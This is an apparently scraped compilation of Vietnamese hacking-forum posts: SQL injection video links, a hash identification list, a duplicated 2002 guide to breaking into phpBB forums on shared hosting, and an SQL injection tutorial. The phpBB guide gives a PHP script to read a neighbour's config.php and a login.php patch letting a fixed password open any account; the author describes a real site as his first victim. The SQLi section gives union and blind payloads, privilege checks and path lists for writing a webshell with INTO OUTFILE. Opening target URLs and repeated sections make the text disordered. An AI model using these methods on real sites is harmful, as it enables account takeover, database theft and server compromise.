http://weavertheme.com/wp-content/plugins/download-monitor/download.php?id=1 http://rod.co.robeson.nc.us/search.php?id=1
Sqli-labs series
Link to part 1: http://www.securitytube.net/video/4171
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176
Link for test bed: https://github.com/Audi-1/sqli-labs
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176
Link for test bed: https://github.com/Audi-1/sqli-labs
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Nhận dạng các loại mã hóa
1.MySQL có 2 loại
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự 3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự
DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự
$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự
$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự
Thêm một cách hack Local Site
Nội dung bài viết của Admin trên diễn đàn HVA -2002
###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.
Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv
Chúc các bạn thành công
###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.
Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv
Chúc các bạn thành công
![]() |
Kỹ thuật tấn công SQLi sử dụng lệnh into outfile của mysql
Trong bài viết này tôi sẽ đề cập đến câu lệnh “into outfile“,
1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker
khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
hoặc
Các câu lệnh này có thể cung cấp thông tin về MySQL user hiện tại, dạng như:
Usernam@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được.
Các câu lệnh ví dụ:
Khi chúng ta đã biết username, ta có thể kiểm tra xem user này có quyền FILE hay không
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
Chú ý: thay username ở câu lệnh trên bằng username mà các bạn vừa tìm được
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi
vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất – khi chuyển sang Blind
Cách trên có thể áp dụng cho cả Mysql version 4.x và 5.x
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
Với blind:
Nếu bạn không thể truy cập vào bảng mysql.user hoặc information_schema.user chúng ta cũng cứ
bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác
sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn
chính xác đến thư mục/file mà ta muốn ghi file.
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ
mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
Trong Mysql 5 thì có thể union select:
Thư mục mặc định để ghi file sẽ là datadir\databasename
Bạn có thể biết được tên databasename bằng câu lệnh
Nếu may mắn, chúng ta có thể thấy các warning của các lệnh như mysql_result(), mysql_free_result(),
mysql_fetch_row() hoặc các lệnh tương tự.
Trong các warning này sẽ hiển thị đường dẫn đến thư mục web và chúng ta dễ dàng xác định được
thư mục để ghi file lên. Các warning này có dạng như
để hiện thị warning này có thể thử câu lệnh 0′ AND 1=’0
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì
bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình.
1 số đường dẫn mặc định đến file cấu hình:
Cũng cần chú ý xem hệ điều hành của webserver là *nix hay win để mà đoán cho tốt
Thông thường thư mục gốc chứa web thường đặt ở:
bạn có thể google để tìm thêm
Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE.
Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public.
Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
Hoặc là ghi bất cứ dữ liệu gì, khi ta không biết tên bảng và cột:
Nếu muốn bỏ các ký tự splitting trong dữ liệu, ta có thể sử dụng INTO DUMPFILE thay vì INTO OUTFILE
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
Trong một số trường hợp ta cần sử dụng hex và unhex:
Hoặc bạn có thể ghi bất cứ thứ j vào file, như là webshell chẳng hạn
Đây là 1 số ví dụ:
hoặc passthru nếu muốn
Cuối cùng, 1 số chú ý về kiểu khai thác này:
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE(‘FILENAME‘) chặn ‘ thì
không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
Code:
1' union select current_user,null/*
Code:
1' union select user(),null/*
Usernam@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được.
Các câu lệnh ví dụ:
Code:
1' and user() like 'root 1' and mid(user(),1,1) 1' and mid(user(),2,1)>'m 1'
and ascii(substring(user(),1,1))>64 .....
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
Code:
1' union select file_priv,null from mysql.user where user='username
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi
vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất – khi chuyển sang Blind
Code:
1' and mid((select file_priv from mysql.user where user='username'),1,1)='a
(đừng có thêm NULL ở đây, vì đây ko phải là union select)
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
Code:
0′ union select grantee,is_grantable FROM information_schema.user_privileges privilege_type = ‘file’ and grantee like ‘%username%
Code:
1′ and mid((select is_grantable from information_schema.user_privileges where privilege_type = ‘file’ and grantee like ‘%username%’),1,1)=’Y
bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác
sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn
chính xác đến thư mục/file mà ta muốn ghi file.
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ
mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
Code:
0′ UNION SELECT load_file(’a'),null/*
Code:
0′ UNION SELECT @@datadir,null/*
Bạn có thể biết được tên databasename bằng câu lệnh
Code:
0′ UNION SELECT database(),null/*
mysql_fetch_row() hoặc các lệnh tương tự.
Trong các warning này sẽ hiển thị đường dẫn đến thư mục web và chúng ta dễ dàng xác định được
thư mục để ghi file lên. Các warning này có dạng như
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/shop/shopping2/list1.html on line 80
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì
bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình.
1 số đường dẫn mặc định đến file cấu hình:
Code:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include

Thông thường thư mục gốc chứa web thường đặt ở:
Code:
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/
